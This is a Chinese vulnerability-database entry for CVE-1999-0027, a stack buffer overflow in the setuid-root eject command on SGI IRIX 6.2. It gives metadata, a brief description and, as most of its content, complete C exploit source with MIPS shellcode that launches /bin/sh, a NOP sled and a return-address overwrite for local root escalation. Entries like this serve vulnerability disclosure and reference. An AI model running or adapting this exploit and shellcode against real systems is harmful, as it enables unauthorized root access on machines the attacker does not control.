@SGI IRIX 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105302 漏洞类型 缓冲区溢出
发布时间 1997-05-25 更新时间 2009-02-25
CVE编号 CVE-1999-0027 CNNVD-ID CNNVD-199707-025
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19276
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-025
|漏洞详情
基于SGIIRIX系统的eject命令存在缓冲区溢出漏洞。可以借助该漏洞获得根特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/351/info

A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations.

/* /usr/sbin/eject exploit by DCRH 25/5/97
 *
 * Tested on: R8000 Power Challenge (Irix64 6.2)
 *
 * Exploit doesn't work on Irix 5.x due to stack position
 * Irix 6.3 does not appear to be vulnerable
 *
 * compile as: cc -n32 eject.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define NUM_ADDRESSES   80
#define BUF_LENGTH      400
#define EXTRA           200
#define OFFSET          -0x128
#define GP_OFFSET       32412
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

#define u_long unsigned


u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */
};

u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */
};

char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)
{
    char *env[] = {NULL};
    u_long targ_addr, stack;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    if (stack & 0x80000000) {
        printf("Recompile with the '-n32' option\n");
        exit(1);
    }

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
      targ_addr += atoi(argv[1]) * 4;

    if (targ_addr + GP_OFFSET > 0x80000000) {
        printf("Sorry - this exploit for Irix 6.x only\n");
        exit(1);
    }

    while ((targ_addr & 0xff000000) == 0 ||
           (targ_addr & 0x00ff0000) == 0 ||
           (targ_addr & 0x0000ff00) == 0 ||
           (targ_addr & 0x000000ff) == 0)
      targ_addr += 4;

    for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
        *long_p++ = targ_addr + NUM_ADDRESSES/2;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = targ_addr + GP_OFFSET;

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle("/usr/sbin/eject", "eject", buf, 0, env);
    perror("execl failed");
}
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/o:sgi:irix*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)BufferErrors(CWE-119)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0027